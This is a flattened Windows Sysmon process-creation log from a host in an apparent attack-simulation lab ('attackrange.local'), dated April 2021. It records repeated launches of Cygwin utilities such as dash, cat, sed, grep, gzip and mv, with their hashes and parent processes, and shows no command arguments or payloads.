14:55:57.092{A8622C2F-53FD-6078-240A-00000000AE01}4160C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051553Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.084{A8622C2F-53FD-6078-230A-00000000AE01}3420C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FD-6078-220A-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051543Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.077{A8622C2F-53FD-6078-220A-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051531Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.064{A8622C2F-53FD-6078-210A-00000000AE01}6440C:\cygwin64\bin\mv.exe-----"C:\cygwin64\bin\mv.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9C3FAC81E10B930A3218459438012345,SHA256=65D525AA50EFE6EE796887C76E8F0E6B99D216018506BB59BF32562C3D32C071,IMPHASH=9C18D209F9C5FB9FE70B2F2187E63FC4{A8622C2F-53FD-6078-200A-00000000AE01}1348C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051521Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.057{A8622C2F-53FD-6078-200A-00000000AE01}1348C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051511Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.049{A8622C2F-53FD-6078-1F0A-00000000AE01}3368C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FD-6078-1D0A-00000000AE01}1140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051493Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.041{A8622C2F-53FD-6078-1E0A-00000000AE01}4344C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FD-6078-1B0A-00000000AE01}6084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051491Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.041{A8622C2F-53FD-6078-1D0A-00000000AE01}1140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051472Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.033{A8622C2F-53FD-6078-1C0A-00000000AE01}5852C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FD-6078-1A0A-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051471Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.033{A8622C2F-53FD-6078-1B0A-00000000AE01}6084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051459Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.026{A8622C2F-53FD-6078-1A0A-00000000AE01}1496C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051447Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.018{A8622C2F-53FD-6078-190A-00000000AE01}1476C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FD-6078-180A-00000000AE01}3156C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051437Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.011{A8622C2F-53FD-6078-180A-00000000AE01}3156C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051425Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.003{A8622C2F-53FD-6078-170A-00000000AE01}2508C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-150A-00000000AE01}5964C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051408Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.996{A8622C2F-53FC-6078-160A-00000000AE01}2084C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-130A-00000000AE01}1800C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051405Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.995{A8622C2F-53FC-6078-150A-00000000AE01}5964C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051387Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.988{A8622C2F-53FC-6078-140A-00000000AE01}6336C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-120A-00000000AE01}6064C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051385Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.988{A8622C2F-53FC-6078-130A-00000000AE01}1800C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.981{A8622C2F-53FC-6078-120A-00000000AE01}6064C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051361Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.973{A8622C2F-53FC-6078-110A-00000000AE01}6032C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-100A-00000000AE01}4160C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051351Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.966{A8622C2F-53FC-6078-100A-00000000AE01}4160C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051339Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.957{A8622C2F-53FC-6078-0F0A-00000000AE01}6076C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-0D0A-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051320Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.949{A8622C2F-53FC-6078-0D0A-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051319Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.949{A8622C2F-53FC-6078-0E0A-00000000AE01}5116C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-0B0A-00000000AE01}6364C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051300Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.942{A8622C2F-53FC-6078-0C0A-00000000AE01}5640C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-0A0A-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051299Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.942{A8622C2F-53FC-6078-0B0A-00000000AE01}6364C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051287Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.935{A8622C2F-53FC-6078-0A0A-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051275Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.927{A8622C2F-53FC-6078-090A-00000000AE01}6652C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-080A-00000000AE01}5396C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051265Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.920{A8622C2F-53FC-6078-080A-00000000AE01}5396C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051253Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.911{A8622C2F-53FC-6078-070A-00000000AE01}6268C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-050A-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051235Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.903{A8622C2F-53FC-6078-060A-00000000AE01}5832C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-030A-00000000AE01}3156C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051233Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.903{A8622C2F-53FC-6078-050A-00000000AE01}1496C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051214Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.896{A8622C2F-53FC-6078-040A-00000000AE01}2508C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-020A-00000000AE01}612C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051213Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.896{A8622C2F-53FC-6078-030A-00000000AE01}3156C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051201Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.889{A8622C2F-53FC-6078-020A-00000000AE01}612C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051189Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.881{A8622C2F-53FC-6078-010A-00000000AE01}6416C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-000A-00000000AE01}5220C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051179Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.874{A8622C2F-53FC-6078-000A-00000000AE01}5220C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051167Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.865{A8622C2F-53FC-6078-FF09-00000000AE01}3912C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-FD09-00000000AE01}6064C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051148Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.857{A8622C2F-53FC-6078-FE09-00000000AE01}4364C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-FB09-00000000AE01}4160C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051147Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.857{A8622C2F-53FC-6078-FD09-00000000AE01}6064C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051128Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.850{A8622C2F-53FC-6078-FC09-00000000AE01}3136C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-FA09-00000000AE01}1348C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051127Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.850{A8622C2F-53FC-6078-FB09-00000000AE01}4160C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051115Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 